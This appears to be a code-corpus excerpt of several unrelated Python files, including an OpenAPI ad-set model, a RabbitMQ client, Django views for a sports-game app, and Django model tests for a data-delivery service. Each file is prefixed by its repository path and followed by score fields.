'scheduling': 'scheduling',
'bidding': 'bidding',
'targeting': 'targeting',
'budget': 'budget'
}
def __init__(self, name=None, scheduling=None, bidding=None, targeting=None, budget=None): # noqa: E501
"""PatchAdSet - a model defined in OpenAPI""" # noqa: E501
self._name = None
self._scheduling = None
self._bidding = None
self._targeting = None
self._budget = None
self.discriminator = None
if name is not None:
self.name = name
if scheduling is not None:
self.scheduling = scheduling
if bidding is not None:
self.bidding = bidding
if targeting is not None:
self.targeting = targeting
if budget is not None:
self.budget = budget
@property
def name(self):
"""Gets the name of this PatchAdSet. # noqa: E501
Name of the ad set # noqa: E501
:return: The name of this PatchAdSet. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this PatchAdSet.
Name of the ad set # noqa: E501
:param name: The name of this PatchAdSet. # noqa: E501
:type: str
"""
self._name = name
@property
def scheduling(self):
"""Gets the scheduling of this PatchAdSet. # noqa: E501
:return: The scheduling of this PatchAdSet. # noqa: E501
:rtype: PatchAdSetScheduling
"""
return self._scheduling
@scheduling.setter
def scheduling(self, scheduling):
"""Sets the scheduling of this PatchAdSet.
:param scheduling: The scheduling of this PatchAdSet. # noqa: E501
:type: PatchAdSetScheduling
"""
self._scheduling = scheduling
@property
def bidding(self):
"""Gets the bidding of this PatchAdSet. # noqa: E501
:return: The bidding of this PatchAdSet. # noqa: E501
:rtype: PatchAdSetBidding
"""
return self._bidding
@bidding.setter
def bidding(self, bidding):
"""Sets the bidding of this PatchAdSet.
:param bidding: The bidding of this PatchAdSet. # noqa: E501
:type: PatchAdSetBidding
"""
self._bidding = bidding
@property
def targeting(self):
"""Gets the targeting of this PatchAdSet. # noqa: E501
:return: The targeting of this PatchAdSet. # noqa: E501
:rtype: AdSetTargeting
"""
return self._targeting
@targeting.setter
def targeting(self, targeting):
"""Sets the targeting of this PatchAdSet.
:param targeting: The targeting of this PatchAdSet. # noqa: E501
:type: AdSetTargeting
"""
self._targeting = targeting
@property
def budget(self):
"""Gets the budget of this PatchAdSet. # noqa: E501
:return: The budget of this PatchAdSet. # noqa: E501
:rtype: PatchAdSetBudget
"""
return self._budget
@budget.setter
def budget(self, budget):
"""Sets the budget of this PatchAdSet.
:param budget: The budget of this PatchAdSet. # noqa: E501
:type: PatchAdSetBudget
"""
self._budget = budget
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, PatchAdSet):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 1.734375 | 2 |
src/robot_service/rabbitmq.py | kenesparta/movie-service-api | 4 | 12764989 | import pika
import config
class RabbitMq:
def __init__(self):
self.conn = None
self.channel = None
self.__config = config.RABBITMQ
self.__connect()
def __connect(self):
self.conn = pika.BlockingConnection(
pika.ConnectionParameters(
host=self.__config['HOST']
)
)
self.channel = self.conn.channel()
self.channel.queue_declare(queue=self.__config['QUEUE'])
def send_message(self, message: str):
self.channel.basic_publish(
exchange='',
routing_key=self.__config['QUEUE'],
body=message,
properties=pika.BasicProperties(
delivery_mode=2,
)
)
self.conn.close()
| 2.671875 | 3 |
django_grapesjs/forms/fields.py | TheLazzziest/django_grapesjs | 6 | 12764990 | from django import forms
from django_grapesjs.settings import BASE, GRAPESJS_DEFAULT_HTML, REDACTOR_CONFIG
from django_grapesjs.utils import apply_string_handling
from .widgets import GrapesJsWidget
__all__ = (
'GrapesJsField',
)
class GrapesJsField(forms.CharField):
'''
Form field with support grapesjs.
'''
widget = GrapesJsWidget
def __init__(self, default_html=GRAPESJS_DEFAULT_HTML, html_name_init_conf=REDACTOR_CONFIG[BASE],
apply_django_tag=False, validate_tags=False, template_choices=None, *args, **kwargs):
super().__init__(*args, **kwargs)
self.widget.default_html = default_html
self.widget.html_name_init_conf = html_name_init_conf
self.widget.apply_django_tag = apply_django_tag
self.widget.template_choices = template_choices
self.validate_tags = validate_tags
def validate(self, value):
super().validate(value)
# TODO: check the field
# if self.validate_tags:
def clean(self, value):
value = apply_string_handling(value, 'apply_tag_save')
return super().clean(value)
| 2.125 | 2 |
split_data/test/test_wiki_vector_summary.py | taisa831/Chainer-Slack-Twitter-Dialogue | 0 | 12764991 | <reponame>taisa831/Chainer-Slack-Twitter-Dialogue<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), "../"))
from input_file import InputFile
from split_synonym_class import SplitSynonymClass
import pyximport
pyximport.install()
from wiki_vector_summary_cython import WikiVectorSummaryCython
from os import path
APP_ROOT = path.dirname(path.abspath(__file__))
class Test_WikiVectorSummary(unittest.TestCase):
"""Test wiki Vector class.
"""
def setUp(self):
"""
setting initial paramater
Args:
data: test file name
split_module: setting the split_module instance
"""
wiki_vector_file_name = APP_ROOT + '/../../Data/jawiki_vector/jawiki_vector_delete_first.txt'
self.word_net_file_name = APP_ROOT + '/../../Data/wnjpn-all.tab'
# wiki_vector_file_name = APP_ROOT + '/../../Data/jawiki_vector/jawiki_vector_part.txt'
# self.word_net_file_name = APP_ROOT + '/../../Data/wnjpn-all_part.tab'
self.input_module = InputFile(wiki_vector_file_name)
def test_summary_class(self):
"""
test make summary dict
"""
self.input_module.input_fast_large_file()
wiki_vector = self.input_module.get_vector()
self.input_module = InputFile(self.word_net_file_name)
self.input_module.input_special_format_file("\t")
test_data = self.input_module.get_file_data()
self.split_synonym_class = SplitSynonymClass(test_data)
self.split_synonym_class.make_dict()
# test all dict
all_dict = self.split_synonym_class.get_all_dict()
# test split dict
split_dict = self.split_synonym_class.get_split_dict()
self.wiki_vector_summary = WikiVectorSummaryCython(all_dict, split_dict, wiki_vector)
self.wiki_vector_summary.get_similler_word()
split_dict = self.wiki_vector_summary.get_split_dict()
for k, v in split_dict.items():
fo = open(APP_ROOT + "/../../Data/wn_summary_all/" + k + ".txt", 'w')
sys.stdout = fo
print(v)
fo.close()
sys.stdout = sys.__stdout__
class_average_vector = self.wiki_vector_summary.get_wiki_average_vector()
for k, v in class_average_vector.items():
fo = open(APP_ROOT + "/../../Data/wn_summary_all_class_average/" + k + ".txt_vector.txt", 'w')
sys.stdout = fo
print(v)
fo.close()
sys.stdout = sys.__stdout__
if __name__ == '__main__':
unittest.main()
| 2.296875 | 2 |
cli/iotexetl/utils/string_utils.py | blockchain-etl/iotex-etl | 3 | 12764992 | import base64
def base64_string(val):
if val is None or val == b'':
return None
return base64.b64encode(val).decode('utf-8')
def to_int(val):
if val is None:
return val
if val == b'':
return 0
if isinstance(val, bytes):
return int.from_bytes(val, 'big')
if isinstance(val, str):
return int(val)
return val
def to_none_if_empty(val):
if val == '':
return None
return val | 3.03125 | 3 |
courtside/game/views.py | alok102singh/courtside | 49 | 12764993 | <gh_stars>10-100
from datetime import datetime
from django.contrib.auth.decorators import login_required
from django.http import HttpResponseRedirect
from django.shortcuts import render, get_object_or_404
from forms.forms import GameForm
from game.models import Player, Sport, Game
def about(request):
return render(request, 'about.html')
def home(request):
""" This method deals with the profile for the user who just signed in.
It will display upcoming games that the user is interested in and games they said they would be part of.
I will also display some user info.
"""
if not request.user.is_authenticated():
soccer = Game.objects.filter(sport=Sport.objects.get(sport="soccer"), active="true")
volleyball = Game.objects.filter(sport=Sport.objects.get(sport="volleyball"), active="true")
baseball = Game.objects.filter(sport=Sport.objects.get(sport="baseball"), active="true")
hockey = Game.objects.filter(sport=Sport.objects.get(sport="hockey"), active="true")
basketball = Game.objects.filter(sport=Sport.objects.get(sport="basketball"), active="true")
return render(request, 'index.html', {'soccer': soccer, 'hockey': hockey, 'basketball': basketball, 'baseball': baseball, 'volleyball': volleyball})
if request.user.is_staff:
return HttpResponseRedirect('/admin/')
player = Player.objects.get(user=request.user)
sports = player.sports.all()
joined_games = player.game_set.all()
my_games = Game.objects.filter(owner=request.user)
profile_pic_url = player.image_url
return render(request, 'profile.html', {'player': player, 'profile_pic_url': profile_pic_url, 'sports': sports, 'games': my_games | joined_games})
@login_required(login_url='/login/')
def create(request):
""" User will create games.
Keyword arguments:
request -
"""
if request.method == 'POST':
form = GameForm(request.POST)
if form.is_valid():
sport = Sport.objects.get(sport=form.cleaned_data['sport'])
#player = Player.objects.get(user=request.user) # unused var
game = Game()
game.sport = sport
game.owner = request.user
game.start_date_and_time = datetime.combine(form.cleaned_data['start_date'], form.cleaned_data['start_time'])
game.address = form.cleaned_data['address']
game.minimum_players = form.cleaned_data['minimum_players']
game.restrictions = form.cleaned_data['restrictions']
game.active = True
if request.POST['lng'] and request.POST['lat']:
game.longitude = request.POST['lng']
game.latitude = request.POST['lat']
game.save()
return HttpResponseRedirect('/game/%s/' % game.id)
else:
form = GameForm()
return render(request, 'create.html', {'form': form})
def game(request, id):
game = get_object_or_404(Game, pk=id)
owner = Player.objects.get(user=game.owner)
players = game.players.all()
# +1 For the owner
number_of_players = len(players) + 1
joined = False
if request.user.is_authenticated():
current_player = Player.objects.get(user=request.user)
current_games = current_player.game_set.all()
if game in current_games:
joined = True
else:
current_player = None
game.sport.name = game.sport.sport.lower()
return render(request, 'game.html',
{'game': game,
'players': players,
'current_player': current_player,
'joined': joined,
'number_of_players': number_of_players,
'owner': owner,
'timezone': 'US/Eastern'}
)
@login_required(login_url='/login/')
def join(request, game_id):
game = get_object_or_404(Game, pk=game_id)
player = Player.objects.get(user=request.user)
game.players.add(player)
return HttpResponseRedirect('/game/%s/' % game_id)
@login_required(login_url='/login/')
def leave(request, game_id):
game = get_object_or_404(Game, pk=game_id)
player = Player.objects.get(user=request.user)
game.players.remove(player)
return HttpResponseRedirect('/game/%s/' % game_id)
@login_required(login_url='/login/')
def delete(request, game_id):
game = get_object_or_404(Game, pk=game_id)
if request.user != game.owner:
return HttpResponseRedirect('/game/%s/' % game_id)
game.players.clear()
game.delete()
return HttpResponseRedirect('/')
@login_required(login_url='/login/')
def search(request):
player = Player.objects.get(user=request.user)
sports = {}
for sport in player.sports.all():
sports[sport.sport] = True
games = {}
games['soccer'] = Game.objects.filter(sport=Sport.objects.get(sport="soccer"), active="true")
games['volleyball'] = Game.objects.filter(sport=Sport.objects.get(sport="volleyball"), active="true")
games['baseball'] = Game.objects.filter(sport=Sport.objects.get(sport="baseball"), active="true")
games['hockey'] = Game.objects.filter(sport=Sport.objects.get(sport="hockey"), active="true")
games['basketball'] = Game.objects.filter(sport=Sport.objects.get(sport="basketball"), active="true")
return render(request, 'search.html', {'games': games, 'sports': sports})
| 2.5 | 2 |
d4s2_api/tests_models.py | Duke-GCB/D4S2 | 0 | 12764994 | <filename>d4s2_api/tests_models.py
from django.db import IntegrityError
from django.core import serializers
from django.test import TestCase
from d4s2_api.models import *
from django.contrib.auth.models import User
import datetime
class TransferBaseTestCase(TestCase):
def setUp(self):
self.transfer_id = 'abcd-1234-efgh-6789'
class DeliveryTestCase(TransferBaseTestCase):
DELIVERY_EMAIL_TEXT = 'delivery email message'
SENDER_COMPLETE_EMAIL_TEXT = 'sender delivery accepted'
RECIPIENT_COMPLETE_EMAIL_TEXT = 'recipient delivery accepted'
DECLINE_EMAIL_TEXT = 'delivery declined'
def setUp(self):
super(DeliveryTestCase, self).setUp()
self.email_template_set = EmailTemplateSet.objects.create(name='someset')
DDSDelivery.objects.create(project_id='project1',
from_user_id='user1',
to_user_id='user2',
transfer_id=self.transfer_id,
email_template_set=self.email_template_set)
def test_initial_state(self):
delivery = DDSDelivery.objects.first()
self.assertEqual(delivery.state, State.NEW, 'New deliveries should be in initiated state')
self.assertEqual(delivery.project_name, '')
def test_required_fields(self):
with self.assertRaises(IntegrityError):
DDSDelivery.objects.create(project_id=None, from_user_id=None, to_user_id=None, transfer_id=None)
def test_prohibits_duplicates(self):
with self.assertRaises(IntegrityError):
DDSDelivery.objects.create(project_id='project1',
from_user_id='user1',
to_user_id='user2',
transfer_id=self.transfer_id)
def test_can_add_share_users(self):
delivery = DDSDelivery.objects.create(project_id='projectA',
from_user_id='user1',
to_user_id='user2',
transfer_id='123-123',
email_template_set=self.email_template_set)
DDSDeliveryShareUser.objects.create(delivery=delivery, dds_id='user3')
DDSDeliveryShareUser.objects.create(delivery=delivery, dds_id='user4')
share_users = delivery.share_users.all()
self.assertEqual(set([share_user.dds_id for share_user in share_users]),
set(['user3', 'user4']))
def test_user_can_be_shared_multiple_deliveries(self):
delivery1 = DDSDelivery.objects.create(project_id='projectA',
from_user_id='user1',
to_user_id='user2',
transfer_id='123-123',
email_template_set=self.email_template_set)
delivery2 = DDSDelivery.objects.create(project_id='projectB',
from_user_id='user3',
to_user_id='user4',
transfer_id='456-789',
email_template_set=self.email_template_set)
DDSDeliveryShareUser.objects.create(delivery=delivery1, dds_id='user3')
DDSDeliveryShareUser.objects.create(delivery=delivery2, dds_id='user3')
self.assertEqual(DDSDeliveryShareUser.objects.count(), 2)
self.assertEqual(set([share_user.dds_id for share_user in DDSDeliveryShareUser.objects.all()]),
set(['user3']))
def test_user_cannot_be_shared_delivery_twice(self):
delivery = DDSDelivery.objects.create(project_id='projectA',
from_user_id='user1',
to_user_id='user2',
transfer_id='123-123',
email_template_set=self.email_template_set)
DDSDeliveryShareUser.objects.create(delivery=delivery, dds_id='user3')
with self.assertRaises(IntegrityError):
DDSDeliveryShareUser.objects.create(delivery=delivery, dds_id='user3')
def test_mark_notified(self):
delivery = DDSDelivery.objects.first()
self.assertEqual(delivery.state, State.NEW)
delivery.mark_notified(DeliveryTestCase.DELIVERY_EMAIL_TEXT)
self.assertEqual(delivery.state, State.NOTIFIED)
def test_mark_accepted(self):
performed_by = 'performer'
delivery = DDSDelivery.objects.first()
self.assertEqual(delivery.state, State.NEW)
delivery.project_name = 'MouseRNA'
delivery.mark_accepted(performed_by, DeliveryTestCase.SENDER_COMPLETE_EMAIL_TEXT)
self.assertEqual(delivery.state, State.ACCEPTED)
self.assertEqual(delivery.performed_by, performed_by)
self.assertEqual(delivery.sender_completion_email_text, DeliveryTestCase.SENDER_COMPLETE_EMAIL_TEXT)
self.assertEqual(delivery.recipient_completion_email_text, '')
self.assertEqual(delivery.project_name, 'MouseRNA')
def test_mark_accepted_with_recipient_email(self):
performed_by = 'performer'
delivery = DDSDelivery.objects.first()
self.assertEqual(delivery.state, State.NEW)
delivery.mark_accepted(performed_by,
DeliveryTestCase.SENDER_COMPLETE_EMAIL_TEXT,
DeliveryTestCase.RECIPIENT_COMPLETE_EMAIL_TEXT)
self.assertEqual(delivery.state, State.ACCEPTED)
self.assertEqual(delivery.performed_by, performed_by)
self.assertEqual(delivery.sender_completion_email_text, DeliveryTestCase.SENDER_COMPLETE_EMAIL_TEXT)
self.assertEqual(delivery.recipient_completion_email_text, DeliveryTestCase.RECIPIENT_COMPLETE_EMAIL_TEXT)
def test_mark_declined(self):
performed_by = 'performer'
delivery = DDSDelivery.objects.first()
self.assertEqual(delivery.state, State.NEW)
delivery.mark_declined(performed_by, 'Wrong person.', DeliveryTestCase.DECLINE_EMAIL_TEXT)
self.assertEqual(delivery.state, State.DECLINED)
self.assertEqual(delivery.decline_reason, 'Wrong person.')
self.assertEqual(delivery.performed_by, performed_by)
self.assertEqual(delivery.sender_completion_email_text, DeliveryTestCase.DECLINE_EMAIL_TEXT)
def test_is_complete(self):
delivery = DDSDelivery.objects.first()
self.assertEqual(delivery.is_complete(), False)
delivery.mark_notified('')
self.assertEqual(delivery.is_complete(), False)
delivery.mark_accepted('', '', '')
self.assertEqual(delivery.is_complete(), True)
delivery.mark_declined('','','')
self.assertEqual(delivery.is_complete(), True)
delivery.state = State.FAILED
delivery.save()
self.assertEqual(delivery.is_complete(), True)
delivery.mark_canceled()
self.assertEqual(delivery.is_complete(), True)
def test_mark_transferring(self):
delivery = DDSDelivery.objects.first()
self.assertEqual(delivery.state, State.NEW)
delivery.mark_transferring()
self.assertEqual(delivery.state, State.TRANSFERRING)
delivery.mark_failed()
self.assertEqual(delivery.state, State.FAILED)
delivery.mark_transferring()
self.assertEqual(delivery.state, State.TRANSFERRING)
delivery.mark_accepted('', '', '')
def test_mark_failed(self):
delivery = DDSDelivery.objects.first()
self.assertEqual(delivery.state, State.NEW)
delivery.mark_failed()
self.assertEqual(delivery.state, State.FAILED)
def setup_incomplete_delivery(self):
delivery = DDSDelivery.objects.first()
delivery.transfer_id = self.transfer_id
delivery.save()
self.assertFalse(delivery.is_complete())
return delivery
def test_user_message(self):
delivery = DDSDelivery.objects.first()
self.assertIsNone(delivery.user_message)
user_message = 'This is the final result of analysis xyz123'
delivery.user_message = user_message
delivery.save()
delivery = DDSDelivery.objects.first()
self.assertEqual(delivery.user_message, user_message)
def test_mark_canceled(self):
delivery = DDSDelivery.objects.first()
self.assertEqual(delivery.state, State.NEW)
delivery.mark_canceled()
self.assertEqual(delivery.state, State.CANCELED)
class ShareTestCase(TransferBaseTestCase):
def setUp(self):
super(ShareTestCase, self).setUp()
self.email_template_set = EmailTemplateSet.objects.create(name='someset')
Share.objects.create(project_id='project1', from_user_id='user1', to_user_id='user2',
email_template_set=self.email_template_set)
def test_initial_state(self):
share = Share.objects.first()
self.assertEqual(share.state, State.NEW, 'New shares should be in initiated state')
self.assertEqual(share.role, ShareRole.DEFAULT, 'New shares should have default role')
def test_prohibits_duplicates(self):
with self.assertRaises(IntegrityError):
Share.objects.create(project_id='project1', from_user_id='user1', to_user_id='user2',
email_template_set=self.email_template_set)
def test_allows_multiple_shares(self):
d = Share.objects.create(project_id='project1', from_user_id='user1', to_user_id='user3',
email_template_set=self.email_template_set)
self.assertIsNotNone(d)
def test_allows_multiple_shares_different_roles(self):
v = Share.objects.create(project_id='project1', from_user_id='user1', to_user_id='user2', role=ShareRole.VIEW,
email_template_set=self.email_template_set)
d = Share.objects.create(project_id='project1', from_user_id='user1', to_user_id='user2', role=ShareRole.EDIT,
email_template_set=self.email_template_set)
self.assertIsNotNone(v)
self.assertIsNotNone(d)
self.assertNotEqual(v, d)
def test_user_message(self):
share = Share.objects.first()
self.assertIsNone(share.user_message)
user_message = 'This is the preliminary result of analysis xyz123'
share.user_message = user_message
share.save()
share = Share.objects.first()
self.assertEqual(share.user_message, user_message)
def test_email_template_name(self):
share = Share.objects.create(project_id='project1', from_user_id='user1', to_user_id='user2',
role=ShareRole.VIEW, email_template_set=self.email_template_set)
self.assertEqual(share.email_template_name(), 'share_project_viewer')
class EmailTemplateTypeTestCase(TestCase):
def requires_unique_types(self):
EmailTemplateType.objects.create(name='type1')
with self.assertRaises(IntegrityError):
EmailTemplateType.objects.create(name='type1')
def test_initial_data(self):
"""
Data for this is loaded by a migration, make sure it's there.
:return:
"""
for role in ShareRole.ROLES:
self.assertIsNotNone(EmailTemplateType.objects.get(name='share_{}'.format(role)))
self.assertIsNotNone(EmailTemplateType.objects.get(name='delivery'))
self.assertIsNotNone(EmailTemplateType.objects.get(name='accepted'))
self.assertIsNotNone(EmailTemplateType.objects.get(name='declined'))
class EmailTemplateTestCase(TestCase):
def setUp(self):
# email templates depend on groups and users
self.template_set = EmailTemplateSet.objects.create(name='template_set')
self.user = User.objects.create(username='test_user')
self.other_user = User.objects.create(username='other_user')
UserEmailTemplateSet.objects.create(user=self.user, email_template_set=self.template_set)
self.user_dds_id = 'user1'
self.default_type = EmailTemplateType.objects.get(name=ShareRole.email_template_name(ShareRole.DEFAULT))
self.download_type = EmailTemplateType.objects.get(name=ShareRole.email_template_name(ShareRole.DOWNLOAD))
self.view_type = EmailTemplateType.objects.get(name=ShareRole.email_template_name(ShareRole.VIEW))
self.transfer_id = 'abc-123'
def test_create_email_template(self):
template = EmailTemplate.objects.create(template_set=self.template_set,
owner=self.user,
template_type=self.default_type,
subject='Subject',
body='email body')
self.assertIsNotNone(template)
def test_prevent_duplicate_types(self):
template1 = EmailTemplate.objects.create(template_set=self.template_set,
owner=self.user,
template_type=self.download_type,
subject='Subject',
body='email body 1')
self.assertIsNotNone(template1)
with self.assertRaises(IntegrityError):
EmailTemplate.objects.create(template_set=self.template_set,
owner=self.user,
template_type=self.download_type,
subject='Subject',
body='email body 2')
def test_allows_duplicate_types_outspide_group(self):
template_set2 = EmailTemplateSet.objects.create(name='template_set2')
template1 = EmailTemplate.objects.create(template_set=self.template_set,
owner=self.user,
template_type=self.download_type,
subject='Subject',
body='email body 1')
self.assertIsNotNone(template1)
template2 = EmailTemplate.objects.create(template_set=template_set2,
owner=self.user,
template_type=self.download_type,
subject='Subject',
body='email body 1')
# assert different items but otherwise data is the same
self.assertIsNotNone(template2)
self.assertNotEqual(template1, template2)
self.assertEqual(template1.owner, template2.owner)
self.assertEqual(template1.subject, template2.subject)
self.assertEqual(template1.body, template2.body)
self.assertEqual(template1.template_type, template2.template_type)
self.assertNotEqual(template1.template_set, template2.template_set)
def test_template_for_name(self):
download_template = EmailTemplate.objects.create(template_set=self.template_set,
owner=self.user,
template_type=self.download_type,
subject='Subject',
body='email body 1')
view_template = EmailTemplate.objects.create(template_set=self.template_set,
owner=self.user,
template_type=self.view_type,
subject='Subject',
body='email body 1')
template_name = ShareRole.email_template_name(ShareRole.DOWNLOAD)
self.assertEqual(self.template_set.template_for_name(template_name), download_template)
template_name = ShareRole.email_template_name(ShareRole.VIEW)
self.assertEqual(self.template_set.template_for_name(template_name), view_template)
class EmailTemplateSetTestCase(TestCase):
def setUp(self):
self.template_name = 'Test Template'
def test_defaults_blank_reply_cc_addresses(self):
template_set = EmailTemplateSet.objects.create(name=self.template_name)
self.assertIsNotNone(template_set)
self.assertEqual(template_set.reply_address, '')
self.assertEqual(template_set.cc_address, '')
def test_raises_invalid_reply_address(self):
template_set = EmailTemplateSet.objects.create(name=self.template_name,
reply_address='not-an-email-address')
with self.assertRaisesMessage(ValidationError, "{'reply_address': ['Enter a valid email address.']}"):
template_set.clean_fields()
def test_valid_reply_address(self):
template_set = EmailTemplateSet.objects.create(name=self.template_name,
reply_address='<EMAIL>')
template_set.clean_fields()
self.assertEqual(template_set.reply_address, '<EMAIL>')
def test_raises_invalid_cc_address(self):
template_set = EmailTemplateSet.objects.create(name=self.template_name,
cc_address='not-an-email-address')
with self.assertRaisesMessage(ValidationError, "{'cc_address': ['Enter a valid email address.']}"):
template_set.clean_fields()
def test_valid_cc_address(self):
template_set = EmailTemplateSet.objects.create(name=self.template_name,
cc_address='<EMAIL>')
template_set.clean_fields()
self.assertEqual(template_set.cc_address, '<EMAIL>')
class S3EndpointTestCase(TestCase):
def test_create_and_read(self):
s3_url = 'https://s3service.com/'
S3Endpoint.objects.create(url=s3_url)
s3_endpoints = S3Endpoint.objects.all()
self.assertEqual(len(s3_endpoints), 1)
self.assertEqual(s3_endpoints[0].url, s3_url)
def test_deserialization_with_get_by_natural_key(self):
s3_endpoint_json_ary = '[{"model": "d4s2_api.s3endpoint", "fields": {"url": "https://s3.com/"}}]'
s3_endpoint_list = list(serializers.deserialize("json", s3_endpoint_json_ary))
self.assertEqual(len(s3_endpoint_list), 1)
s3_endpoint_list[0].save()
s3_endpoints = S3Endpoint.objects.all()
self.assertEqual(len(s3_endpoints), 1)
self.assertEqual(s3_endpoints[0].url, "https://s3.com/")
class S3UserTestCase(TestCase):
def setUp(self):
self.user1 = User.objects.create(username='user1')
self.user2 = User.objects.create(username='user2')
def test_create_and_read(self):
endpoint = S3Endpoint.objects.create(url='https://s3service.com/')
s3_user1 = S3User.objects.create(endpoint=endpoint,
s3_id='user1_s3_id',
user=self.user1)
self.assertEqual(s3_user1.type, S3UserTypes.NORMAL)
self.assertEqual(s3_user1.get_type_label(), 'Normal')
s3_user2 = S3User.objects.create(endpoint=endpoint,
s3_id='user1_s3_id',
user=self.user2,
type=S3UserTypes.AGENT)
self.assertEqual(s3_user2.type, S3UserTypes.AGENT)
self.assertEqual(s3_user2.get_type_label(), 'Agent')
s3_users = S3User.objects.order_by('s3_id')
self.assertEqual(len(s3_users), 2)
self.assertEqual([s3_user.s3_id for s3_user in s3_users],
['user1_s3_id','user1_s3_id'])
def test_duplicating_endoint_and_user(self):
# One django user can have multiple S3Users as long as the endpoints are different
endpoint1 = S3Endpoint.objects.create(url='https://s3service1.com/', name='primary')
endpoint2 = S3Endpoint.objects.create(url='https://s3service2.com/', name='secondary')
S3User.objects.create(endpoint=endpoint1, s3_id='user1_s3_id', user=self.user1)
S3User.objects.create(endpoint=endpoint2, s3_id='user1_s3_2id', user=self.user1)
with self.assertRaises(IntegrityError):
S3User.objects.create(endpoint=endpoint1, s3_id='user1_s3_3id', user=self.user1)
def test_endpoint_name_must_be_unique(self):
# One django user can have multiple S3Users as long as the endpoints are different
endpoint1 = S3Endpoint.objects.create(url='https://s3service1.com/', name='primary')
with self.assertRaises(IntegrityError):
S3Endpoint.objects.create(url='https://s3service2.com/', name='primary')
class S3UserCredentialTestCase(TestCase):
def setUp(self):
self.user1 = User.objects.create(username='user1')
self.endpoint = S3Endpoint.objects.create(url='https://s3service.com/')
self.s3_user1 = S3User.objects.create(endpoint=self.endpoint,
s3_id='user1_s3_id',
user=self.user1)
def test_create_and_read(self):
S3UserCredential.objects.create(s3_user=self.s3_user1, aws_secret_access_key='secret123')
s3_user_credentials = S3UserCredential.objects.all()
self.assertEqual(len(s3_user_credentials), 1)
self.assertEqual(s3_user_credentials[0].aws_secret_access_key, 'secret123')
self.assertEqual(s3_user_credentials[0].s3_user, self.s3_user1)
def test_creating_multiple_credentials_for_one_user(self):
S3UserCredential.objects.create(s3_user=self.s3_user1, aws_secret_access_key='secret123')
with self.assertRaises(IntegrityError):
S3UserCredential.objects.create(s3_user=self.s3_user1, aws_secret_access_key='secret124')
class S3BucketTestCase(TestCase):
def setUp(self):
self.user1 = User.objects.create(username='user1')
self.endpoint = S3Endpoint.objects.create(url='https://s3service.com/')
self.s3_user1 = S3User.objects.create(endpoint=self.endpoint,
s3_id='user1_s3_id',
user=self.user1)
def test_create_and_read(self):
S3Bucket.objects.create(name='mouse', owner=self.s3_user1, endpoint=self.endpoint)
S3Bucket.objects.create(name='mouse2', owner=self.s3_user1, endpoint=self.endpoint)
S3Bucket.objects.create(name='mouse3', owner=self.s3_user1, endpoint=self.endpoint)
s3_buckets = S3Bucket.objects.order_by('name')
self.assertEqual(len(s3_buckets), 3)
self.assertEqual([s3_bucket.name for s3_bucket in s3_buckets],
['mouse', 'mouse2', 'mouse3'])
def test_prevents_duplicate_name_endpoint(self):
S3Bucket.objects.create(name='mouse', owner=self.s3_user1, endpoint=self.endpoint)
with self.assertRaises(IntegrityError):
S3Bucket.objects.create(name='mouse', owner=self.s3_user1, endpoint=self.endpoint)
class S3DeliveryCredentialTestCase(TestCase):
def setUp(self):
self.email_template_set = EmailTemplateSet.objects.create(name='someset')
self.user1 = User.objects.create(username='user1')
self.user2 = User.objects.create(username='user2')
self.endpoint = S3Endpoint.objects.create(url='https://s3service.com/')
self.s3_user1 = S3User.objects.create(endpoint=self.endpoint,
s3_id='user1_s3_id',
user=self.user1)
self.s3_user2 = S3User.objects.create(endpoint=self.endpoint,
s3_id='user2_s3_id',
user=self.user2)
self.s3_bucket = S3Bucket.objects.create(name='mouse', owner=self.s3_user1, endpoint=self.endpoint)
self.s3_bucket2 = S3Bucket.objects.create(name='mouse2', owner=self.s3_user1, endpoint=self.endpoint)
def test_create_and_read(self):
S3Delivery.objects.create(bucket=self.s3_bucket, from_user=self.s3_user1, to_user=self.s3_user2,
email_template_set=self.email_template_set)
S3Delivery.objects.create(bucket=self.s3_bucket2, from_user=self.s3_user1, to_user=self.s3_user2,
email_template_set=self.email_template_set)
s3_deliveries = S3Delivery.objects.order_by('bucket__name')
self.assertEqual([s3_delivery.bucket.name for s3_delivery in s3_deliveries],
['mouse', 'mouse2'])
def test_prevents_creating_same_delivery_twice(self):
S3Delivery.objects.create(bucket=self.s3_bucket, from_user=self.s3_user1, to_user=self.s3_user2,
email_template_set=self.email_template_set)
with self.assertRaises(IntegrityError):
S3Delivery.objects.create(bucket=self.s3_bucket, from_user=self.s3_user1, to_user=self.s3_user2,
email_template_set=self.email_template_set)
class DDSDeliveryErrorTestCase(TestCase):
def setUp(self):
self.email_template_set = EmailTemplateSet.objects.create(name='someset')
self.delivery1 = DDSDelivery.objects.create(
project_id='project1',
from_user_id='user1',
to_user_id='user2',
transfer_id='transfer1',
email_template_set=self.email_template_set)
self.delivery2 = DDSDelivery.objects.create(
project_id='project2',
from_user_id='user2',
to_user_id='user3',
transfer_id='transfer2',
email_template_set=self.email_template_set)
def test_create_errors(self):
DDSDeliveryError.objects.create(message='Something failed', delivery=self.delivery1)
DDSDeliveryError.objects.create(message='Other failed', delivery=self.delivery1)
deliveries = DDSDeliveryError.objects.order_by('message')
self.assertEqual(len(deliveries), 2)
self.assertEqual(deliveries[0].message, 'Other failed')
self.assertIsNotNone(deliveries[0].created)
self.assertEqual(type(deliveries[0].created), datetime.datetime)
self.assertEqual(deliveries[1].message, 'Something failed')
self.assertIsNotNone(deliveries[1].created)
self.assertEqual(type(deliveries[1].created), datetime.datetime)
def test_read_via_delivery_errors(self):
DDSDeliveryError.objects.create(message='Error1', delivery=self.delivery1)
DDSDeliveryError.objects.create(message='Error2', delivery=self.delivery1)
DDSDeliveryError.objects.create(message='Error3OtherDelivery', delivery=self.delivery2)
